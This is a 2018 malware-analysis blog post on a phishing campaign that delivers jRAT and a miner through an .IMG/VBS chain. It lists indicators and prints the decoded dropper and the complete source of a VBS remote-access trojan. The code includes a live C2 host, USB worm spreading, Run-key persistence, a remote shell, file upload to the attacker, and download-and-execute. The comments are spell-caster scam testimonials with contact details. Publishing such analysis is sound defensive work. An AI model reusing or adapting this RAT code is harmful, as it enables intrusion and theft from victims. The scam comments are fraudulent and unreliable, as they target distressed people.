Monday, November 5, 2018

Jrat and Bitcoin miner from Phishing email with .IMG with nested .VBS 11/5/2018

phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside


X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018 

-------------


more details here

https://pastebin.com/raw/tkGXMENU

and also pasted below

---------------


#phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside

more info @neonprimetime
https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html

------
VT links
------
https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community

----
app anyrun
----
https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814

-----
dns
-----
welcomehome.duckdns.org [173.46.85.98]
fud.fudcrypt.com

----
md5 hashes
----
f3a99bcd752bff6a15154484c94cdc21
f3c67b1a2631fde05b24ab26ce5bf6ea
b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
11d828c9301a36749174b1e0459cba55
d859b188405930541aea64ad22f8cf92
7443f9ecbd050b1e7eae529983543b05

------
email headers
------
X-Env-Sender: dbittnerf@gmail.com 
x-originating-ip: [162.144.196.83] 
Received: from server.ineli-mena.org (HELO server.ineli-mena.org) 
From: "Purchase Assistance" <dbittnerf@gmail.com> 
Subject: RE: B&amp;G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018

---------------
vbscript
---------------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "m"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing

---------------
decoded binary
---------------
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim longText1
longText1 = "[REMOVED]"
Set wshShell1 = CreateObject("WScript.Shell")
Dim appdatadir1, stubpath1
appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
Dim decoded1
decoded1 = decodeBase64(longText1)
writeBytes stubpath1, decoded1
wshShell1.Run("""" & stubpath1 & """")
Set wshShell1 = Nothing
Dim longText
longText = "[REMOVED]"
longText = Replace(longText, "#(", "A")
Set wshShell = CreateObject( "WScript.Shell" )
Dim tempdir, appdatadir, text, stubpath
tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
stubpath = appdatadir & "\ntfsmgr.jar"
Dim decoded
decoded = decodeBase64(longText)
writeBytes stubpath, decoded
Set fso  = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text = "" Then
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text <> "" Then
text = text & "\bin\javaw.exe"
End If
Else
text = text & "\bin\javaw.exe"
End If
If InStr(text, "jre") > 0 Then
Dim validJrePath
validJrePath = getValidJre(text)
If InStr(validJrePath, "javaw.exe") > 0 Then
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
Else
GrabJreFromNet()
End If
Else
GrabJreFromNet()
End If
Private Sub GrabJreFromNet()
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile appdatadir & "\jre.zip", 2 
end with
UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
End Sub
Private Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, ForWriting
End Sub
Sub UnZip(zipfile, ExtractTo)
if fso.GetExtensionName(zipfile) = "zip" then
If NOT fso.FolderExists(ExtractTo) Then
fso.CreateFolder(ExtractTo)
End If
set objShell = CreateObject("Shell.Application")
set destination = objShell.NameSpace(ExtractTo)
set zip_content = objShell.NameSpace(zipfile).Items   
for i = 0 to zip_content.count - 1
if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
end if
destination.copyHere zip_content.item(i), 20
next 
End if
End Sub
Function getValidJre(res)
a = Split(res, vbCrLf)
for each x in a
if InStr(x, "javaw.exe") > 0 Then
Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
text = file.ReadAll
file.Close
If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
getValidJre = x
Exit Function
End If
End If
next
End Function
Set wshShell = Nothing


------
nested vbscript
------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "A"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing


-----
3rd nested script decoded
-----

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

'host = "pm2bitcoin.com"
'port = 3175
host = "fud.fudcrypt.com"
port = 7755
installdir = "%appdata%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
  osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
  .type = 1 
  .open
  .write objhttpdownload.responsebody
  .savetofile strsaveto
  .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
 set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
   .type = 1 
   .open
   .write objhttpdownload.responsebody
   .savetofile strsaveto
   .close
 end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
  .loadfromfile fileurl
  buffer = .read
  .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
 enumprocess = enumprocess & objitem.name & "|"
 enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

5 comments:

  1. This is a testimony that I will tell everyone to hear. i have been married four 4 years and on the fifth year of my marriage, another woman had a spell to take my lover away from me and my husband left me and the kids and we have suffered for 2 years until i meant a post where this man Dr, kuta have helped someone and i decided to give him a try to help me bring my love Husband home and believe me i just send my picture to him and that of my husband and after 48 hours as he have told me, i saw a car drove into the house and behold it was my husband and he have come to me and the kids and that is why i am happy to make every one of you in similar to met with this man and have your lover back to your self His email: drkutaherbalcenter@gmail.com you can also contact him or whatspp him on this +2347054547814 thank so much

    ReplyDelete
  2. All thanks to the great Priest Dr bow for helping me restore back my marriage when i taught all hope was lost.,this Priest helped me, and my relationship is now perfect. Contact for any spiritual work  (@Drbowsolutionhome1) Your partner will definitely love you email him Drbowsolutionhome@gmail.com or whatapp him +2348121786772

    ReplyDelete
  3. How I Got My Ex Husband Back..Am so excited to share my testimony of a real spell caster who brought my husband back to me. My husband and I have been married for about 6 years now. We were happily married with two kids, a boy and a girl. 3 months ago, I started to notice some strange behavior from him and a few weeks later I found out that my husband is seeing someone else. He started coming home late from work, he hardly care about me or the kids anymore, Sometimes he goes out and doesn't even come back home for about 2-3 days. I did all I could to rectify this problem but all to no avail. I became very worried and needed help. As I was browsing through the internet one day, I came across a website that suggested that Dr Aluya can help solve marital problems, restore broken relationships and so on. So, I felt I should give him a try. I contacted him and and told him my problems and he told me what to do and i did it and he did a spell for me. 48 hours later, my husband came to me and apologized for the wrongs he did and promise never to do it again. Ever since then, everything has returned back to normal. I and my family are living together happily again.. All thanks to Dr Aluya Powerful Love Spell that really works. If you have any problem contact him and i guarantee you that he will help you. He will not disappoint you. Email him at: aluya.48hoursspelltemple@gmail.com. or whatsapp him on: +2348110493039 

    ReplyDelete
  4. SPELLS THAT WORKS I am sharing this testimony to partners suffering in their relationships LOVE because there is an enduring solution.
    My husband left me and our 2 kids for another woman for 3 years. I tried to be strong just for my kids but I could not control the pains that torment my heart. I was hurt and confused. I needed a help, so i did a research on the internet and came across a site where I saw that Dr. Aluya a spell caster, can help get lovers back. I contacted him and he did a special prayer and spells for me. To my surprises, after some days, my husband came back home. That was how we reunited again and there was a lot of love, joy and peace in the family.
    You can as well contact Dr.  Aluya  , a powerful spell-caster for solutions on his contact aluya.48hoursspelltemple@gmail.com or directly on Whats App: +2348110493039

    ReplyDelete
  5. Hello to everyone out here, I am here to share the unexpected miracle that happened to me … My name is Susan Christian , I live in London, UK. we got married for more than 9 years and have gotten two kids. thing were going well with us and we are always happy. until one day my husband started to behave in a way i could not understand, i was very confused by the way he treat me and the kids. later that month he did not come home again and he called me that he want a divorce, i asked him what have i done wrong to deserve this from him, all he was saying is that he want a divorce that he hate me and do not want to see me again in his life, i was mad and also frustrated do not know what to do, i was sick for more than 2 weeks because of the divorce. i love him so much he was everything to me without him my life is incomplete. i told my sister and she told me to contact a spell caster, i never believe in all this spell casting of a thing. i just want to try if something will come out of it. i contacted Dr Emu for the return of my husband to me, they told me that my husband have been taken by another woman, that she cast a spell on him that is why he hate me and also want us to divorce. then they told me that they have to cast a spell on him that will make him return to me and the kids, they casted the spell and after 24 hours my husband called me and he told me that i should forgive him, he started to apologize on phone and said that he still live me that he did not know what happen to him that he left me. it was the spell that he Dr Emu casted on him that make him come back to me today, me and my family are now happy again today. thank you Dr Emu for what you have done for me i would have been nothing today if not for your great spell. i want you my friends who are passing through all this kind of love problem of getting back their husband, wife , or ex boyfriend and girlfriend to contact Dr Emu ,if you need his help you can contact him through his private mail: emutemple@gmail.com or you can contact him through his website https://emutemple.wordpress.com/ fb page Https://web.facebook.com/Emu-Temple-104891335203341 and you will see that your problem will be solved without any delay.

    ReplyDelete